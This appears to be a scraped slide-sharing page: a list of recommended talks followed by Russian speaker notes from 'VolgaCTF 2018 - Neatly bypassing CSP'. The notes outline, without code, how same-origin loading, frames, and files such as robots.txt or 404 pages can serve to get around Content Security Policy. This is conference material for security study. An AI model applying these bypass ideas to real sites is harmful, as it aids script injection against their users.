[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
Jason Yip
 
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin..."$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
Fwdays
 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
Antonios Katsarakis
 
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptxPRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
christinelarrosa
 
ScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking ReplicationScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking Replication
ScyllaDB
 
AppSec PNW: Android and iOS Application Security with MobSF
AppSec PNW: Android and iOS Application Security with MobSFAppSec PNW: Android and iOS Application Security with MobSF
AppSec PNW: Android and iOS Application Security with MobSF
Ajin Abraham
 
Containers & AI - Beauty and the Beast!?!
Containers & AI - Beauty and the Beast!?!Containers & AI - Beauty and the Beast!?!
Containers & AI - Beauty and the Beast!?!
Tobias Schneck
 

Recently uploaded (20)

Mutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented ChatbotsMutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented Chatbots
 
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
 
JavaLand 2024: Application Development Green Masterplan
JavaLand 2024: Application Development Green MasterplanJavaLand 2024: Application Development Green Masterplan
JavaLand 2024: Application Development Green Masterplan
 
Essentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation ParametersEssentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation Parameters
 
GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)
 
AWS Certified Solutions Architect Associate (SAA-C03)
AWS Certified Solutions Architect Associate (SAA-C03)AWS Certified Solutions Architect Associate (SAA-C03)
AWS Certified Solutions Architect Associate (SAA-C03)
 
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
 
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search",  Taras Kloba"NATO Hackathon Winner: AI-Powered Drug Search",  Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
 
Apps Break Data
Apps Break DataApps Break Data
Apps Break Data
 
Christine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptxChristine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptx
 
GlobalLogic Java Community Webinar #18 “How to Improve Web Application Perfor...
GlobalLogic Java Community Webinar #18 “How to Improve Web Application Perfor...GlobalLogic Java Community Webinar #18 “How to Improve Web Application Perfor...
GlobalLogic Java Community Webinar #18 “How to Improve Web Application Perfor...
 
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge GraphGraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
 
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillinQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
 
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
 
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin..."$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
 
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptxPRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
 
ScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking ReplicationScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking Replication
 
AppSec PNW: Android and iOS Application Security with MobSF
AppSec PNW: Android and iOS Application Security with MobSFAppSec PNW: Android and iOS Application Security with MobSF
AppSec PNW: Android and iOS Application Security with MobSF
 
Containers & AI - Beauty and the Beast!?!
Containers & AI - Beauty and the Beast!?!Containers & AI - Beauty and the Beast!?!
Containers & AI - Beauty and the Beast!?!
 

VolgaCTF 2018 - Neatly bypassing CSP

Editor's Notes

  1. Не стоит забывать, что self позволяет работать в контексте SOP в рамках этого домена, поэтому мы по-прежнему можем грузить сценарии, создавать фреймы, изображения. Если вспомнить о фреймах, то CSP распространяется и на фреймы, в том числе если в качестве протокола будет указан data, blob, или будет сформирован фрейм с помощью атрибута srcdoc.
  2. Gstatic
  3. Это нужно для корректного отображения содержимого пользователю, чтобы у изображения был фон и она была расположена по центру. Но iframe также является окном! Поэтому открытие в нем файлов, которые отображаются в браузере, например favicon.ico или robots.txt, автоматически преобразуются в HTML, независимо, корректные ли данные в нем, главное чтоб был правильный content-type.
  4. Откуда можно грузить скрипты?
  5. Robots, subdomains, 404